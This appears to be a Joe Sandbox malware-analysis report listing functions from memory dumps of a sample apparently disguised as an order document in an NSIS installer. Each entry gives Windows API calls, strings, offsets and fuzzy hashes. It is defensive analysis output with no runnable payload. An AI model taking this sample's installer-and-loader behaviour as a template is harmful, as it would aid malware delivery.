
Strings

f, xrefs: 00404CD1

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4

Function 00402E4A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
MulDiv.KERNEL32(?,00000064,?), ref: 00402E90
wsprintfA.USER32 ref: 00402EA0
SetWindowTextA.USER32(?,?), ref: 00402EB0
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2

Strings

verifying installer: %d%%, xrefs: 00402E9A

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99

Function 00406647 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
wsprintfA.USER32 ref: 00406697
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004066AB

Strings

%s%s.dll, xrefs: 00406691
\, xrefs: 0040666F
UXTHEME, xrefs: 00406650

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69

Function 35FB6870 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB6972
$~q, xrefs: 35FB69C1
$~q, xrefs: 35FB69F8
$~q, xrefs: 35FB6A22
$~q, xrefs: 35FB6A2E
$~q, xrefs: 35FB6966
$~q, xrefs: 35FB69EC
$~q, xrefs: 35FB69CD

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q
API String ID: 0-2858235012
Opcode ID: 972f26fbf8a0ea2e20ca532729eb2f7f14435c370bc3aa3e2d3eca0e5838d8e1
Instruction ID: 19764708c90cd2389562c2cda1e51eff2ab89ac76fc3e66d98afff54aced82fb
Opcode Fuzzy Hash: 972f26fbf8a0ea2e20ca532729eb2f7f14435c370bc3aa3e2d3eca0e5838d8e1
Instruction Fuzzy Hash: 56916E74A04209DFEF14DBA6C994BAEB7B6FF84340F208929D411AB295DBB49D45CBC0

Function 0040280D Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
GlobalFree.KERNEL32(?), ref: 004028C9
GlobalFree.KERNEL32(00000000), ref: 004028DC
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
Opcode Fuzzy Hash: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8

Function 00403168 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004031CF
GetTickCount.KERNEL32 ref: 00403276
MulDiv.KERNEL32(7FFFFFFF,00000064,00000008), ref: 0040329F
wsprintfA.USER32 ref: 004032AF

Strings

... %d%%, xrefs: 004032A9

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
Opcode Fuzzy Hash: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

Function 00406587 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(0000000C,*?|<>/":,00000000,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
CharNextA.USER32(0000000C,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
CharPrevA.USER32(0000000C,0000000C,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601

Strings

*?|<>/":, xrefs: 004065CF

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D

Function 35FB2F98 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB32E1
$~q, xrefs: 35FB34AD
$~q, xrefs: 35FB34A1
$~q, xrefs: 35FB327B
$~q, xrefs: 35FB32D5
$~q, xrefs: 35FB3435

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q$$~q$$~q
API String ID: 0-2846834050
Opcode ID: e77e3e12f0ade9c92894080de615fc5552f71838d83f332aa5479dfdaf16e915
Instruction ID: 0c24a7de7e28b94e56ed68fcdbea0759c0f76c5dcf8629dc15eb5a8ad550f5a0
Opcode Fuzzy Hash: e77e3e12f0ade9c92894080de615fc5552f71838d83f332aa5479dfdaf16e915
Instruction Fuzzy Hash: B1F17C74B00205CFDB19DFA5C490A5EB7B2FF88301F258529D816AB399CBB1ED46CB85

Function 0040177E Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017BD
CompareFileTime.KERNEL32(-00000014,?,0040A430,0040A430,00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017E7

Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A

Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,763F23A0), ref: 0040542D
Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
Opcode Fuzzy Hash: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8

Function 00401D8A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401DA3
GetClientRect.USER32(?,?), ref: 00401DF1
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
DeleteObject.GDI32(00000000), ref: 00401E45

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58

Function 00401E5A Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E5D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
ReleaseDC.USER32(?,00000000), ref: 00401E90
CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
Opcode Fuzzy Hash: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D

Function 00401C53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB

Strings

!, xrefs: 00401C8F

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18

Function 00404B76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
wsprintfA.USER32 ref: 00404C1C
SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F

Strings

%u.%u%s%s, xrefs: 00404BFE

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
Opcode Fuzzy Hash: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9

Function 004020CA Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020F5

Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,763F23A0), ref: 0040542D
Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402105
GetProcAddress.KERNEL32(00000000,?), ref: 00402115
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
Opcode Fuzzy Hash: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E

Function 00402ECD Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
GetTickCount.KERNEL32 ref: 00402EFE
CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED

Function 00405345 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405374
CallWindowProcA.USER32(?,?,?,?), ref: 004053C5

Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B

Strings

, xrefs: 00405355

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E

Function 00405E4F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E63
GetTempFileNameA.KERNEL32(0000000C,?,00000000,?,?,004033D6,00436000,00436400,00436400,00436400,00436400,00436400,00436400,004036B5,?,00000008), ref: 00405E7D

Strings

nsa, xrefs: 00405E5A

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798

